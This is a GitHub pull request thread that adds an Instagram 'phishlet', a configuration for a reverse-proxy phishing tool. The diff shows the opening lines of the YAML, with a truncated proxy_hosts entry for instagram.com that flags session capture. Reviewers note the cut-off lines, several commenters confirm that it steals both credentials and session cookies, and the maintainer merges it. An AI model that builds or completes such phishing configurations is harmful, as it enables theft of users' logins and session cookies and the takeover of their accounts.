### PR TITLE
Create instagram.yaml

### PR DESCRIPTION
**Pull request by princenasario**
Instagram Phishlet

### CODE REVIEW

**Comment by ahhh** [comment]
Your lines got cut off at the same location, making this config invalid

File: phishlets/instagram.yaml [hunk 1]
```diff
@@ -0,0 +1,19 @@
+author: '@prrrrinncee'
+min_ver: '2.2.0'
+proxy_hosts:
+  - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true,$
```
Comment (ahhh) [inline phishlets/instagram.yaml]: blocks never complete, see the end of the line at `true,$`

Comment (princenasario) [reply phishlets/instagram.yaml]: Thanks. Corrected the script

**Comment by kgretzky** [comment]
Can anyone confirm that it works? I don't have an instagram account to test with.

**Comment by serverattack** [comment]
@kgretzky it works. Both the credentials and the cookie session works 
capture_censored

**Comment by serverattack** [comment]
@kgretzky It works. Both the credentials and the cookie session works. 
capture_censored 1

**Comment by princenasario** [comment]
@kgretzky it works according to myself and @serverattack

**Comment by kgretzky** [comment]
Ok thanks! Merging into the repo. Thanks for your work!

**Pull request merged**